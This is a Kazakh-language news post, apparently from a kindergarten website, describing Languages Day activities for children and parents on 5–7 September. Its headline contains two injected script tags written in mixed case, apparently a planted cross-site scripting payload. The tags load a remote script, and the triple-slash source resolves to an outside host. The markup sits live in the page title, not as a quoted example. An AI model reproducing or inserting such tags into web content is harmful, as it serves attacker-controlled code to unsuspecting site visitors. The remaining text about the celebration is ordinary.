5-қыркүйек Қазақстан халқы Тілдер күні мерекесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.09.2023

«Жұлдыз» балабақшасында 5-қыркүйек Қазақстан Республикасының Тілдер күні мерекесіне арналған іс-шаралар өтіп жатыр.  Күнделікті іс-шаралар  жоспар бойынша өткізілуде.

Мақсаты: Балабақша тәрбиеленушілерін қасиетті ана тілімізге деген сүйіспеншілікті арттыру, ана тіліміздің қадір-қасиетін біліп, сөз құдіретін түсіне білуге баулу; ойлау қабілетін, тіл байлығын дамыту; тіл мәртебесін арттыруға атсалысуға тәрбиелеу.

5-қыркүйек күні барлық топ тәрбиешілері өз топтарында тәрбиеленушілерге «Менің туған тілім» тақырыбында  әңгімелесу өткізді.

6-қыркүйек «Сүйемін туған тілді – анам тілім» тақырыбында газет шығарып, тәрбиеленушілерге тіл туралы түсінік беріп, тілге деген құрмет, сүйіспешіліктері дами түсті.

7-қыркүйек «Мемлекеттік тіл – татулық тірегі» тақырыбында ата-аналармен бірігіп сурет салу көрмесі өтті. Ата-ана мен баланың тілге деген сүйіспеншілігін арттыру, мемлекеттік тілді дәріптеу, оның мәртебесін көтеруге ат салысу мақсатында жүргізілді.

Просмотров: 1483


Пікір қосу



Деректерді қолтаңбаға қосу